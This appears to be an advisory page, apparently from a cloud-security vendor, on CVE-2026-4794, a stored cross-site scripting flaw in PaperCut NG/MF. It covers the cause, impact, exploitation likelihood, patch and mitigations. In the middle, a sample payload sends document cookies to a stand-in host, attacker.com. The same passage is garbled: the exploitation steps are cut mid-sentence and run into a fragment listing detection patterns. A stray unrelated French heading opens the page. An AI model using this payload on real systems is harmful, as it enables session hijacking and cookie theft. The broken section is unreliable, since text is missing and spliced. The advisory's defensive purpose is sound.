
PEACH
Un cadre d’isolation des locataires
CVE-2026-4794 describes multiple stored cross-site scripting (XSS) vulnerabilities in PaperCut NG and PaperCut MF print management software affecting all versions before 25.0.10. Authenticated administrator users can inject arbitrary web script or HTML code via various UI fields in the admin interface, potentially compromising other administrators' sessions or enabling unauthorized actions within an authenticated context. The vulnerability was published on March 31, 2026, with a patch released in version 25.0.10. It carries a CVSS v3.1 base score of 4.8 (Medium) and a CVSS v4.0 base score of 2.1 (Low) (GitHub Advisory, PaperCut Bulletin).
The root cause is improper neutralization of user-controllable input before it is rendered in web pages served to other users (CWE-79). Multiple UI fields within the PaperCut NG/MF administrator interface fail to sanitize input, allowing a malicious administrator to store crafted JavaScript or HTML payloads that execute in the browser context of other administrators who subsequently view the affected pages. Exploitation requires the attacker to already hold valid administrator credentials and the attack requires passive user interaction from a victim administrator (i.e., the victim must view the page containing the injected payload). No public proof-of-concept exploit code has been identified (GitHub Advisory, PaperCut Bulletin).
Successful exploitation allows an attacker with administrator-level access to hijack other administrators' authenticated sessions, perform unauthorized administrative actions on their behalf, or exfiltrate session tokens and sensitive configuration data visible within the admin UI. The scope is changed (subsequent system impact), meaning the injected script executes in the browser context of other administrators rather than just the attacker's own session, resulting in low confidentiality and low integrity impacts on the subsequent system. Availability is not directly impacted, and exploitation is constrained to the administrative interface (GitHub Advisory, PaperCut Bulletin).
There is no evidence of public proof-of-concept exploit code or active in-the-wild exploitation as of the time of publication. The EPSS score is approximately 0.044% (4th percentile), indicating a low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation is significantly constrained by the requirement for existing administrator credentials and passive interaction from a victim administrator (GitHub Advisory).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into one or more vulnerable UI fields and save the configuration.<script>, onerror=, javascript:).PaperCut has released a patch in PaperCut NG/MF version 25.0.10; organizations should upgrade immediately (PaperCut Bulletin). As interim mitigations, restrict administrator account access to the minimum number of trusted users and enforce strong authentication (e.g., MFA) for all admin accounts. Implementing a Content Security Policy (CSP) header on the PaperCut web interface can reduce the impact of any XSS payloads by restricting script execution to trusted sources. Monitor administrator accounts for suspicious activity and review audit logs for unexpected configuration changes.
Source: Ce rapport a été généré à l’aide de l’IA
Évaluation gratuite des vulnérabilités
Évaluez vos pratiques de sécurité cloud dans 9 domaines de sécurité pour évaluer votre niveau de risque et identifier les failles dans vos défenses.
Obtenez une démo personnalisée
"La meilleure expérience utilisateur que j’ai jamais vue, offre une visibilité totale sur les workloads cloud."
"Wiz fournit une interface unique pour voir ce qui se passe dans nos environnements cloud."
"Nous savons que si Wiz identifie quelque chose comme critique, c’est qu’il l’est réellement."